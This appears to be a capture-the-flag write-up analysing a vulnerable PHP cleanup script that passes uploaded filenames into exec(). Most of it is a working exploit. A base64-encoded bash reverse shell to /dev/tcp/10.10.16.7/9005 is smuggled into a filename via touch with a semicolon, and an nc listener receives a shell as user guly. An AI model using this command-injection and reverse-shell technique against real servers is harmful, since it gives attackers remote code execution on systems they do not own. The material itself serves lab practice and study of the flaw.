5 check_attack.php

# file: lib.php
getnameCheck($value) | 10_10_16_7.php.png
=> same as before LITERALLY.
	pieces = array(split on '.') | Array ( [0] => 10_10_16_7 [1] => php [2] => png ) 
	name = pieces[0] | 10_10_16_7
	name = replace '_' with '.' | 10.10.16.7
	ext = join pieces with '.' after the removed 1st element |  php.png
	return name, ext
	
check_ip($name, $ext) | name=IP, ext=filename
	check if name is an IP using FILTER_VALIDATE_IP
		msg = filename
		return true, msg
	else => 
		return false, attack on file <file>: not valid IP
	
loads all files in /var/www/html/uploads/
	if file = 'index.html' => do nothing
	
	getnameCheck() | returns name=IP, ext=extension
	check = check_ip | returns true,filename
	
	if check[0] is false,
		create /tmp/attack.log with file contents
		exec("rm -f $logpath");
		exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
		echo "rm -f $path$value\n";
		send mail $to $subject $msg $headers
	
# we control the paramater value (the filename) in file

# tried running this file on locally and any new file created
# the IP gets broken as filename is split on the first '.'
# base64

$ echo -n 'bash -c "bash -i >/dev/tcp/10.10.16.7/9005 0>&1"' | base64
YmFzaCAtYyAiYmFzaCAtaSA+L2Rldi90Y3AvMTAuMTAuMTYuNy85MDA1IDA+JjEi

$ touch -- ';echo YmFzaCAtYyAiYmFzaCAtaSA+L2Rldi90Y3AvMTAuMTAuMTYuNy85MDA1IDA+JjEi|base64 -d | bash'
$ nc -lvnp 9005
listening on [any] 9005 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.146] 34270
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
whoami
guly

Last updated